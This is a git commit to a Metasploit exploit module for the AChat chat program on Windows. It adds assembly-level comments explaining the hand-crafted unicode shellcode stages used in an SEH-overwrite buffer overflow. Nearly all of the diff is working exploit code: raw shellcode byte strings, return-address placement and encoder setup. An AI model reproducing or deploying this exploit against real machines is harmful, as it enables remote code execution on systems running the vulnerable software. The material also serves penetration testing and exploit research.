hex strings related explanations

2015-02-09 23:21:38 +01:00 · 2015-02-09 23:21:38 +01:00 · c7880ab4e1
parent 9891026d30
commit c7880ab4e1
1 changed files with 35 additions and 0 deletions
--- a/modules/exploits/windows/misc/achat_beta.rb
+++ b/modules/exploits/windows/misc/achat_beta.rb
@ -67,6 +67,22 @@ class Metasploit3 < Msf::Exploit::Remote
  def exploit
    connect_udp

+    # 0055 00          ADD BYTE PTR SS:[EBP],DL # padding
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # padding
+    # 55               PUSH EBP                 # ebp holds a close pointer to the payload
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # mov eax, ebp
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 05 00140011      ADD EAX,11001400         # adjusting eax
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 50               PUSH EAX                 # eax points to the start of the shellcode
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # padding
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 59               POP ECX                  # padding
+    # 0039             ADD BYTE PTR DS:[ECX],BH # padding
    firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
    encoder = framework.encoders.create('x86/unicode_mixed')
    encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
@ -78,7 +94,26 @@ class Metasploit3 < Msf::Exploit::Remote
    sploit << "\x61\x40" # POPAD + INC EAX

    sploit << target.ret # AChat.exe p/p/r address
+
    # adjusting the first thread's unicode payload, tricky asm-fu
+    # the first seh exception jumps here, firststage variable will be executed
+    # by the second seh exception as well. It needs to be in sync with the second
+    # thread, so that is why we adjust eax/ebp to have a close pointer to the
+    # payload, then firststage variable will take the rest of the job.
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 55               PUSH EBP                 # ebp with close pointer to payload
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # put ebp to eax
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
+    # 05 00140011      ADD EAX,11001400         # more adjusting
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 50               PUSH EAX			# saving eax
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 5D               POP EBP			# mov ebp, eax
    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
    sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
    sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX